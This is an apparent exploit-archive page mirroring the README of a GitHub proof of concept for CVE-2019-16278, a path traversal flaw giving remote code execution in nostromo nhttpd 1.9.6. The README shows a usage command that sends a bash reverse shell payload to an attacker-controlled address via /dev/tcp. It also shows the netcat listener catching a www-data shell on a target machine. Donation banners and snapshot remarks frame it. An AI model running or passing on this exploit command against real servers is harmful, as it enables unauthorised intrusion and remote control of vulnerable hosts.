Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-16278 PoC — nostromo nhttpd 路径遍历漏洞

Source
https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE
Associated Vulnerability
Title:nostromo nhttpd 路径遍历漏洞 (CVE-2019-16278)
Description:nostromo nhttpd是一款开源的Web服务器。 nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
Description
This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.
Readme
# CVE-2019-16278-Nostromo-1.9.6-RCE
This is a exploit of CVE-2019-16278 for Nostromo 1.9.6 RCE. This exploit allows RCE on the victim machine.
# Requirements
optparse
socat
sys
# Usage
You can use the exploit as follows:
```bash
python3 CVE-2019-16278.py --ip=10.129.192.225 --port=80 --command="bash -c 'bash -i >& /dev/tcp/10.10.16.42/443 0>&1'"
b'HTTP/1.1 200 OK\r\nDate: Thu, 04 May 2023 22:05:36 GMT\r\nServer: nostromo 1.9.6\r\nConnection: close\r\n\r\n\r\n'

nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.42] from (UNKNOWN) [10.129.192.225] 40752
bash: cannot set terminal process group (1005): Inappropriate ioctl for device
bash: no job control in this shell
www-data@traverxec:/usr/bin$ whoami
whoami
www-data
www-data@traverxec:/usr/bin$
```
Luck Hacking!!!
File Snapshot

 [4.0K]  /data/pocs/19fd0d5b3163f1fd05eb930d9aaade4746ed61da
├── [1.5K]  CVE-2019-16278.py
└── [ 784]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.